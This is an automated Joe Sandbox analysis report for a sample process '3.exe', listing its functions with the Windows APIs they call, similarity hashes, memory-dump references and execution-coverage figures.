Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: 5b0718a67a7f861a04a94dd647d6cfdaacc38d17286c7623e5c3193b6d1b4b95
Instruction ID: 46fef1ba4bc0d28f0efb9f3044cf943d34e9d37c35c873fe41967cb6fa0bad0a
Opcode Fuzzy Hash: 5b0718a67a7f861a04a94dd647d6cfdaacc38d17286c7623e5c3193b6d1b4b95
Instruction Fuzzy Hash: 39F0A0712407046F8734AF59FC85C4BB3EDEF86B5076109AAFA45C3642D7B0E9048BB5

Function 00B8ABDA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B8AC65
__alldvrm.LIBCMT ref: 00B8AE66
__alldvrm.LIBCMT ref: 00B8AE88

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
Instruction ID: 3bd8f5544889ade69c24ab79395a7435d92ca11c7694f3c93a989ce9303ee8b7
Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
Instruction Fuzzy Hash: 68A14A71A003869FFB12EF18C8917AEBBE5EF11311F2845EEE4859B2A1C6388D41C752

Function 00B6B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B68D5C,?,?,?), ref: 00B6B7F3
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00B68D5C,?,?), ref: 00B6B837
SetFileTime.KERNEL32(?,00B68AEC,?,00000000,?,00000800,?,00B68D5C,?,?,?,?,?,?,?,?), ref: 00B6B8B8
CloseHandle.KERNEL32(?,?,00000800,?,00B68D5C,?,?,?,?,?,?,?,?,?,?), ref: 00B6B8BF

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: cffffe8e6034d925034b59047763884c62028ad4391ab654e8a132eca33b17ff
Instruction ID: 615f577013a3aa775504bddd05c2e64222fdbf84671394c0ec497ce53dbdfe92
Opcode Fuzzy Hash: cffffe8e6034d925034b59047763884c62028ad4391ab654e8a132eca33b17ff
Instruction Fuzzy Hash: FA41E031248381AAE731DF24DC55FAABBF8AB85300F0409ADF6D1D3191D768DE88DB52

Function 00B610E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B6110B
_wcslen.LIBCMT ref: 00B61133
_wcslen.LIBCMT ref: 00B61162
_wcslen.LIBCMT ref: 00B61189

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 812f55104c914db2c6043254674beb7ae438ef9b83ff207bbe3a56b0f632a3ac
Instruction ID: b736ca405e4fcf0db1ac05018dc4d0b8530f5677d5c627cb126f48254dc79d4c
Opcode Fuzzy Hash: 812f55104c914db2c6043254674beb7ae438ef9b83ff207bbe3a56b0f632a3ac
Instruction Fuzzy Hash: 3541A3719006259BCB11AF6C8C599EE7BF8EF05310F040469FA09F7255DF34AE498BE4

Function 00B6851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B68532
_wcslen.LIBCMT ref: 00B68558
_wcslen.LIBCMT ref: 00B685EF
_wcslen.LIBCMT ref: 00B68657

Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991

Part of subcall function 00B6B41F: RemoveDirectoryW.KERNEL32(?,?,?,00B68649,?), ref: 00B6B430
Part of subcall function 00B6B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00B68649,?), ref: 00B6B45E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID:
API String ID: 973666142-0
Opcode ID: e0f50f7b53dfb6e5f5ef76ba58ffa1aa3b18ce34434ecafa38cc78c1fb134bab
Instruction ID: 04bd82986c70c9a8fe9a311ee609f9c8967816657255571022113ffa401b16b4
Opcode Fuzzy Hash: e0f50f7b53dfb6e5f5ef76ba58ffa1aa3b18ce34434ecafa38cc78c1fb134bab
Instruction Fuzzy Hash: 1631B2729002549ACF21AF64CC41AEA33E5EF55384F0445EAF94AA7155EF78CEC4CB90

Function 00B8DB48 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00B85AD4,00000000,00000000,00B86B09,?,00B86B09,?,00000001,00B85AD4,62E85006,00000001,00B86B09,00B86B09), ref: 00B8DB95
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B8DC1E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B8DC30
__freea.LIBCMT ref: 00B8DC39

Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2a6a6a145673e8074ecf16dc24073e9871a14d2611c3cd12d5f9569d44479dbb
Instruction ID: 0cf70daaf9f69574786ce9bc8aaeb0c02ac90a3491fb811809ebc22717aa950f
Opcode Fuzzy Hash: 2a6a6a145673e8074ecf16dc24073e9871a14d2611c3cd12d5f9569d44479dbb
Instruction Fuzzy Hash: D131C372A0021AABDF25AF65CC45DAE7BE5EF44720F0541AAFC04D71A0EB35DD91CB90

Function 00B7B673 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B7B676
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B7B685
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B7B693
ReleaseDC.USER32(00000000,00000000), ref: 00B7B6A1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 27aeb138dd6e55330ca737ad6379f2a2b98454cc1404d344927066cb12012fe9
Instruction ID: 417bf00eef2bcfd93a3812958b610526e9e60d715fa7eb0bf8e0e6f65a555a55
Opcode Fuzzy Hash: 27aeb138dd6e55330ca737ad6379f2a2b98454cc1404d344927066cb12012fe9
Instruction Fuzzy Hash: B8E0EC71989A61ABD7311B60AC1EF9A7B54EB1E712F084005FA05A7290CFB058808FE1

Function 00B7B81C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00B7B6A9: GetDC.USER32(00000000), ref: 00B7B6AD
Part of subcall function 00B7B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7B6B8
Part of subcall function 00B7B6A9: ReleaseDC.USER32(00000000,00000000), ref: 00B7B6C3

GetObjectW.GDI32(?,00000018,?), ref: 00B7B84C

Part of subcall function 00B7BADE: GetDC.USER32(00000000), ref: 00B7BAE7
Part of subcall function 00B7BADE: GetObjectW.GDI32(?,00000018,?), ref: 00B7BB16
Part of subcall function 00B7BADE: ReleaseDC.USER32(00000000,?), ref: 00B7BBAE

Strings

(, xrefs: 00B7B9BF

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 6bea1968ea44e540473841e78796adc0669d22773d3790e0df79275a218d469c
Instruction ID: 5b7f63b01b62452ed7cb5156ef4e429f33a440dfe0d02d2584af6eb258b5ec81
Opcode Fuzzy Hash: 6bea1968ea44e540473841e78796adc0669d22773d3790e0df79275a218d469c
Instruction Fuzzy Hash: E791C071608354AFD620DF25D844E2BBBE8FF89704F00895EF59AD3260DB30A846CF62

Function 00B680BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B680C3

Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D

Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B68262

Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B

Strings

:, xrefs: 00B68134

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 2a1954082f7dac48d2cc0f60dee71ca1826d03e5c1314dbd07f9ac40f992e07d
Instruction ID: 48eca7d7f42d9246fa00b65a6fc7ec0e7abe8f59049d13e9531d739a4be2e690
Opcode Fuzzy Hash: 2a1954082f7dac48d2cc0f60dee71ca1826d03e5c1314dbd07f9ac40f992e07d
Instruction Fuzzy Hash: F5511E71800558AAEB25EB54CC56EEE73FDEF46300F0041E5B609B7092DB785F8ACE61

Function 00B7C67E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B7C6D3
_wcslen.LIBCMT ref: 00B7C6EE

Strings

}, xrefs: 00B7C6C6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 3b9b2d251cd0edca3d10fdbb2c3ce3bf9e5992204502d3c4d6c1d60a1225c799
Instruction ID: 281a56008a4e8ca71867a25babeba98e47a3e0e60e832fa8b45be0b955e3fc11
Opcode Fuzzy Hash: 3b9b2d251cd0edca3d10fdbb2c3ce3bf9e5992204502d3c4d6c1d60a1225c799
Instruction Fuzzy Hash: 822135325043065AD734EF64C842A6BBBECDF81750F1044AEF648C7141EF61EE4887A2

Function 00B7069C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B70627: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B70646
Part of subcall function 00B70627: GetProcAddress.KERNEL32(00BAA1F0,CryptUnprotectMemory), ref: 00B70656

GetCurrentProcessId.KERNEL32(?,00000200,?,00B70697), ref: 00B7072A

Strings

CryptProtectMemory failed, xrefs: 00B706E1
CryptUnprotectMemory failed, xrefs: 00B70722

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 7cfbabcb961f961656f9baba053b66fa9b13a993547e12dfeb62f653b042f6b3
Instruction ID: e0743d0fbb727fb6ef9b903d9334041cac351df6db53ab2255e1cd67812f81ee
Opcode Fuzzy Hash: 7cfbabcb961f961656f9baba053b66fa9b13a993547e12dfeb62f653b042f6b3
Instruction Fuzzy Hash: 92112931A14264EBDF196F20DC81E6E3BE4EF41764B0581D7FC296B251DB30AD42CAD5

Function 00B6CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B6CDE7

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

Strings

%c:\, xrefs: 00B6CDDD

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: e77057e491ecf08f86ef0c3d2c0be5a5d99b9274aad462b49e6274d1aa040ea1
Instruction ID: c78ce9ba80c41fee3a6bb7bc849ec4f26445a2a87423d819836efb97bf8b15e8
Opcode Fuzzy Hash: e77057e491ecf08f86ef0c3d2c0be5a5d99b9274aad462b49e6274d1aa040ea1
Instruction Fuzzy Hash: 3C01F5635047117ADA206B799C86D7BAFFCEF95770B54849AF484C6092EA39E840C2E1

Function 00B7F82F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00B7F774,0000001C,00B7F969,00000000,?,?,?,?,?,?,?,00B7F774,00000004,00BC3D24,00B7F9F9), ref: 00B7F840
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B7F774,00000004,00BC3D24,00B7F9F9), ref: 00B7F85B

Strings

D, xrefs: 00B7F84F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 51dbbe8adafcac9398ea81d2626ee7b37a0033eb5798a726588f3322bffecd50
Instruction ID: 9c54e70b00088ba7bf2b59b2c099af12c9ba8fce01f8483bbf57d26b2d9e1504
Opcode Fuzzy Hash: 51dbbe8adafcac9398ea81d2626ee7b37a0033eb5798a726588f3322bffecd50
Instruction Fuzzy Hash: 2001D8726001199BCB14DF25DC05AED7BE9EFC4324F08C175AD69D7154DA34D9018680

Function 00B612F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00B6F608: _swprintf.LIBCMT ref: 00B6F62E
Part of subcall function 00B6F608: _strlen.LIBCMT ref: 00B6F64F
Part of subcall function 00B6F608: SetDlgItemTextW.USER32(?,00BA0274,?), ref: 00B6F6AF
Part of subcall function 00B6F608: GetWindowRect.USER32(?,?), ref: 00B6F6E9
Part of subcall function 00B6F608: GetClientRect.USER32(?,?), ref: 00B6F6F5

GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

Strings

0, xrefs: 00B612F9

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: e6d59b3c1d051c3b5d6cec5253a887dffd8d3db4a238bba4596fdcee464602f2
Instruction ID: dcc7b1e2f58f84f78799d0b57288c91618e68d11ad7410824c8e32b3b0179318
Opcode Fuzzy Hash: e6d59b3c1d051c3b5d6cec5253a887dffd8d3db4a238bba4596fdcee464602f2
Instruction Fuzzy Hash: BDF08C30104648BADF250F69880DBA93BD8FB15784F0C49B4FC46556A2CB78C990EB94

Function 00B72303 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00B72420,?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72309
GetLastError.KERNEL32(?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72315

Part of subcall function 00B676E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B67707

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B7231E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 94514eabb5c15fd469e1ec0ceed2205a75d2e8d207d1ee8fa34b4599a6d2d238
Instruction ID: 423f4f23e80312cac7bd0f2c3f8dd4a6e9a30cfdb4b0a2872d666072527d7b45
Opcode Fuzzy Hash: 94514eabb5c15fd469e1ec0ceed2205a75d2e8d207d1ee8fa34b4599a6d2d238
Instruction Fuzzy Hash: 5BD05B7254C52137C5112328AC0AD6F79959F22734F254795F239571F1CFA4095182A5

Function 00B6F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00B6ED75,?), ref: 00B6F5C3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B6ED75,?), ref: 00B6F5D1

Strings

RTL, xrefs: 00B6F5CB

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: a6986d22d943306008482836ab8174d96cc9cd120f6e4dc6c02e7d98af55e58e
Instruction ID: bd175292bd48d02e0006566c1be3a2f73e99498220325a8c1370b8ff31caabe8
Opcode Fuzzy Hash: a6986d22d943306008482836ab8174d96cc9cd120f6e4dc6c02e7d98af55e58e
Instruction Fuzzy Hash: 05C0123124535056DA3027717D1DF832ED85B00715F050499B601DB2D0DFEACC428660

Analysis Process: 3.exePID: 7308, Parent PID: 7208COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	7

Executed Functions

Function 00DE80C8 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false

Joe Sandbox IDA Plugin

